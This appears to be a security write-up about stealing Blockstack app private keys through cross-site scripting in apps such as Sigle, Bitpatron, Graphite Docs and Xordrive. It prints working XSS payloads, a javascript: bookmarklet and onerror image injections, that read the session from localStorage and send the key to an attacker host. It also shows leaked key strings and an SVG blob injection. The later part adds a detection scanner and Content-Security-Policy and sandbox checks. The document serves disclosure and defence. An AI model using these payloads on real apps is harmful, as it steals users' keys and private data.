Stealing app private keys on Blockstack

Sigle

Sigle front page
Sigle alert box
javascript:(function(){var a=JSON.parse(localStorage.getItem('blockstack-session'));window.location.href='http://keythief.evildomain.com/?k='+a.userData.appPrivateKey+','+location.origin;})();
Private Sigle post
4f4298165a7dcc67d84b37cff40b104fddb03524d88d4d9d4124ba1e12a17d85,https://app.sigle.io
Sigle private data exposed

Bitpatron

Bitpatron myFiles.json
{"1":{"content":"\"<p>I just stole your app private key</p><img src=\\\"bogus.gif\\\" onerror=\\\"var a=JSON.parse(localStorage.getItem('blockstack'));this.src='http://keythief.evildomain.com/?k='+a.appPrivateKey+','+location.origin;this.onerror=null\\\">\""},"currentFileName":1}
035f81b38451b8edf1646aeceabc506773cc3d38444ecb89cec2a96274111941,https://bitpatron.co
Bitpatron private data

Graphite Docs

Graphite Docs public file on Gaia
{"title":"Steal my keys","content":"<img src=\"bogus.gif\" onerror=\"var a=JSON.parse(localStorage.getItem('blockstack-session'));this.src='http://keythief.evildomain.com/?k='+a.userData.appPrivateKey+','+location.origin;this.onerror=null\">","readOnly":true,"words":3,"shared":"2/16/2020","singleDocIsPublic":true}
Graphite Docs private document
4c508b4e0897bb29c31b6a38815da726c3ff066ba063a1b0f540f1e66849215b,https://app.graphitedocs.com
Graphite Docs private data
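The Bitpatron and Graphite Docs payloads above share one shape: stored content that an app later renders as HTML, carrying an `<img>` whose `onerror` handler reads the session from `localStorage`. Before an app (or an incident responder reviewing a user's Gaia bucket) renders such records, the string fields can be screened for markup that executes script. The scanner below is an added example, not code from the original article or from any of the apps it names; `SAMPLE_RECORD`, the field names in it and the `collector.example` URL are constructed to mirror the stored payloads shown above.

```javascript
// Added example (not code from the original article or from any app it names):
// scan a stored document record, as an app would receive it from storage,
// for markup that executes script if the app renders it without sanitizing.
// SAMPLE_RECORD below is constructed to mirror the shape of the stored
// payloads shown in the article; the collector URL in it is a placeholder.

const RISKY_PATTERNS = [
  { name: 'inline event handler', re: /<[^>]*\son[a-z]+\s*=/i },
  { name: 'script element', re: /<script\b/i },
  { name: 'javascript: URL', re: /(?:href|src|action)\s*=\s*["']?\s*javascript:/i },
  { name: 'blob/data URL', re: /(?:href|src)\s*=\s*["']?\s*(?:blob|data):/i },
  { name: 'localStorage access', re: /localStorage\s*\.\s*getItem|localStorage\s*\[/i },
];

// Collect every string leaf of a parsed JSON value together with its path.
function stringLeaves(value, path = '$', out = []) {
  if (typeof value === 'string') {
    out.push({ path, value });
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => stringLeaves(v, `${path}[${i}]`, out));
  } else if (value !== null && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) stringLeaves(v, `${path}.${k}`, out);
  }
  return out;
}

// Stored content may be double-encoded (a JSON string holding JSON text, as in
// the Bitpatron record); unwrap a few levels so patterns see the markup itself.
function unwrap(text) {
  let current = text;
  for (let depth = 0; depth < 3; depth++) {
    try {
      const inner = JSON.parse(current);
      if (typeof inner !== 'string') break;
      current = inner;
    } catch (_) {
      break;
    }
  }
  return current;
}

// Return one hit per (field path, pattern) found anywhere in the record.
function scanRecord(json) {
  const hits = [];
  for (const { path, value } of stringLeaves(JSON.parse(json))) {
    const text = unwrap(value);
    for (const { name, re } of RISKY_PATTERNS) {
      if (re.test(text)) hits.push({ path, pattern: name });
    }
  }
  return hits;
}

// Constructed sample: one file whose content carries an onerror handler that
// reads the session from localStorage, and one harmless file.
const SAMPLE_RECORD = JSON.stringify({
  1: {
    content: JSON.stringify(
      '<p>hello</p><img src="bogus.gif" onerror="fetch(\'https://collector.example/?k=\'' +
        "+localStorage.getItem('blockstack-session'))\">",
    ),
  },
  2: { content: '<p>A harmless post with a <a href="https://example.com">link</a></p>' },
  currentFileName: 1,
});

for (const hit of scanRecord(SAMPLE_RECORD)) console.log(`${hit.path}: ${hit.pattern}`);
```

The patterns are a screening aid for stored data, not a sanitizer: a record that trips none of them may still be unsafe to render as HTML, so the rendering path still needs a real allowlist-based sanitizer or, better, no HTML rendering of user-controlled content at all.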

Xordrive

Xordrive front page
<?xml version="1.0" encoding="utf-8"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<script type="text/javascript">
document.location.href='https://example.com';
</script>
</svg>
var svg = '<?xml version="1.0" encoding="utf-8"?><svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><script type="text/javascript">console.log(localStorage)</script></svg>';
var blob = new Blob([svg],{type:"image/svg+xml"});
document.getElementsByTagName('iframe')[0].src = URL.createObjectURL(blob);

Other applications

Preventing the attack

<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
Refused to run the JavaScript URL because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.
var content = '<html><body><script>alert("evil")</script></body></html>';
var blob = new Blob([content],{type:"text/html"});
var frame = document.createElement('iframe');
frame.sandbox = '';
frame.src = URL.createObjectURL(blob);
document.body.appendChild(frame);
Blocked script execution in 'blob:https://...' because the document's frame is sandboxed and the 'allow-scripts' permission is not set.
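The two mitigations above work for different reasons: the `script-src 'self'` policy refuses the `javascript:` URL and inline `onerror` handlers because neither is a script from the page's own origin, and the empty `sandbox` attribute denies script to the framed blob document because `allow-scripts` is not granted. The evaluator below is an added example, not code from the original article; it parses a CSP value and a sandbox attribute and reports whether they would still let inline script run. `HARDENED_POLICY` is the meta tag's policy from above; `LOOSENED_POLICY` is a constructed sample of the kind of policy that results when `'unsafe-inline'` is added to stop inline scripts from breaking.

```javascript
// Added example (not code from the original article): a small evaluator for
// Content-Security-Policy values and iframe sandbox attributes, reporting
// whether a policy refuses the javascript: URL and inline onerror handlers
// described in the article. The two policies at the bottom are samples.

// Parse a CSP string into a Map of directive name -> source expressions.
// Browsers honour only the first occurrence of a duplicated directive.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// script-src governs script execution; default-src is the fallback.
// null means the policy places no restriction on scripts at all.
function scriptSources(directives) {
  if (directives.has('script-src')) return directives.get('script-src');
  if (directives.has('default-src')) return directives.get('default-src');
  return null;
}

function assessScriptPolicy(policy) {
  const sources = scriptSources(parseCsp(policy));
  if (sources === null) {
    return {
      blocksInline: false,
      findings: ['no script-src or default-src: inline scripts and javascript: URLs run'],
    };
  }
  const findings = [];
  const has = (keyword) => sources.some((s) => s.toLowerCase() === keyword);
  // A nonce or hash in the same directive makes browsers ignore 'unsafe-inline'.
  const hasNonceOrHash = sources.some((s) => /^'(nonce-|sha(256|384|512)-)/i.test(s));
  const inlineAllowed = has("'unsafe-inline'") && !hasNonceOrHash;
  if (inlineAllowed) findings.push("'unsafe-inline' permits inline event handlers and javascript: URLs");
  if (has("'unsafe-eval'")) findings.push("'unsafe-eval' permits eval() and Function()");
  if (has('*')) findings.push("'*' allows external scripts from any host");
  if (sources.some((s) => /^https?:$/i.test(s))) findings.push('scheme-only source allows external scripts from any host');
  for (const scheme of ['blob:', 'data:']) {
    if (has(scheme)) findings.push(`${scheme} allows scripts from URLs the page itself can mint`);
  }
  return { blocksInline: !inlineAllowed, findings };
}

// An iframe sandbox attribute blocks script unless it lists allow-scripts;
// pass null for a frame that has no sandbox attribute at all.
function sandboxBlocksScripts(sandboxAttr) {
  if (sandboxAttr === null || sandboxAttr === undefined) return false;
  return !sandboxAttr.toLowerCase().split(/\s+/).includes('allow-scripts');
}

// The policy from the meta tag above, and a constructed loosened variant.
const HARDENED_POLICY = "script-src 'self'";
const LOOSENED_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline' https:";

for (const [label, policy] of [['hardened', HARDENED_POLICY], ['loosened', LOOSENED_POLICY]]) {
  const result = assessScriptPolicy(policy);
  console.log(`${label}: blocksInline=${result.blocksInline}; ${result.findings.join('; ') || 'no findings'}`);
}
console.log(`sandbox="" blocks scripts: ${sandboxBlocksScripts('')}`);
```

The evaluator deliberately ignores `'strict-dynamic'`, report-only headers and path matching, so treat it as a quick check on a policy string rather than a model of the browser's full CSP algorithm. Its `blocksInline` result corresponds to the two console messages quoted above: inline script and `javascript:` navigation are refused unless `'unsafe-inline'` is present and not overridden by a nonce or hash.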

Conclusion
